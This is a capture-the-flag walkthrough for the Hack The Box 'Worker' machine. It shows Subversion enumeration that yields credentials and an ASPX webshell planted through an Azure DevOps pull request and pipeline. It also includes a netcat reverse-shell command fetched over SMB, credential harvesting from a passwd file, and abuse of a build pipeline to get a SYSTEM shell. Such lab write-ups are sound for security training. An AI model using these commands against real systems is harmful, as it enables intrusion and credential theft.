Worker

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.203 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,3690,5985 10.10.10.203 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

Ports 80 (HTTP), which may have a website, port 3690 (Subversion) and port 5985 (WinRM) are open. If we take a look at the website, we'll see the default IIS page.

As we saw in the nmap report, port 3690 is open. We could try to enumerate the Subversion server. To enumerate the server, run the following command.

svn ls snv://10.10.10.203

There is some content in it. Let's download the content of the Subversion server.

svn checkout svn://10.10.10.203

If we look in our current directory, we'll see the dimension.worker.htb directory, and the moved.txt file. Let's take a look at that file.

cat moved.txt

Now that we know a few domain names, let's add them to the /etc/hosts file.

nano /etc/hosts

We could also see the commits that have been made.

svn log svn://10.10.10.203

As we can see, all the commits have been made by the nathen user. Let's see the content of the r2 commit.

svn up -r 2

Now we have the deploy.ps1 file. Let's take a look at it.

cat deploy.ps1

Now we have some credentials. Let's take a look at the dimension.worker.htb site, and see if there is any virtual hosting.

Not much going on. Let's take a look now at the devops.worker.htb site.

Let's try to log in with the found credentials.

And we get it.

Exploitation

Let's click on the SmartHotel360 project.

From the Repos section we can see all the subdomains of the worker.htb domain. The idea here is to upload a .aspx webshell, that you can download from here, to one of the subdomains sites, for example the alpha.worker.htb. To do it, select the alpha repository, and click on Upload file(s).

Then select the cmd.aspx file and hit on Commit.

But we get an error because we can not change the master branch. So let's go back, and create a new branch.

Let's call it webshell.

Then, upload the cmd.aspx webshell to the webshell branch.

Then, click on Create a pull request.

And click on Create.

Then, click on Approve.

Now, from the Pipelines section, let's run the Alpha-CI pipeline.

And select the webshell branch.

Finally, the cmd.aspx file is in the master branch, and we can access it from the browser.

http://alpha.worker.htb/cmd.aspx

Time to get a shell. First, let's set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now, let's set an SMB server on the directory where the nc.exe binary is located.

impacket-smbserver smbFolder $(pwd) -smb2support

Finally, if we execute the cmd.exe program with the following parameters on the webshell, we'll get a reverse shell as the iis apppool\defaultapppool user.

c:\windows\system32\cmd.exe

/c \10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444

Privilege Escalation

Enumerating the system, we could guess that the user flag is inside the robisl home directory.

dir \users

At this point, something that we could do is enumerate the logical disks available on the system.

wmic logicaldisk get name

There is the W: logical disk. Let's enumerate it.

dir W:

Inside the svnrepos directory, we could find the \svnrepos\www\conf\passwd file, which contains a lot of credentials, including the nathen and robisl users.

type W:\svnrepos\www\conf\passwd

We could try the credentials for the robisl user on the devops.worker.htb website.

Now we see the PartsUnlimited project.

This project only has one repository.

From the Project setings > Security we can see that the robisl user is a member of the Build Administrators group, so we can create pipelines.

Let's go the Pipelines section, and create a new pipeline.

Then, select the Azure Repos Git option.

Then, select the PartsUnlimited project.

Now, select the Starter pipeline.

Then, we will configure the YAML file by changing the pool value to Setup. As the agent pool is called that way.

And then we'll change the script value to a command which will send us a reverse shell.

Make sure to still have the SMB server set on the directory where the nc.exe binary is. Then let's set another netcat listener on port 4444.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Then, click on Save and run, and select the Create a new branch for this commit and start a pull request option. Then click on Save and run.

Then, we'll have to wait for a bit, and we'll get a shell as the nt authority\system user. Then all we have to do is reap the harvest and take the root flag.

Last updated

Was this helpful?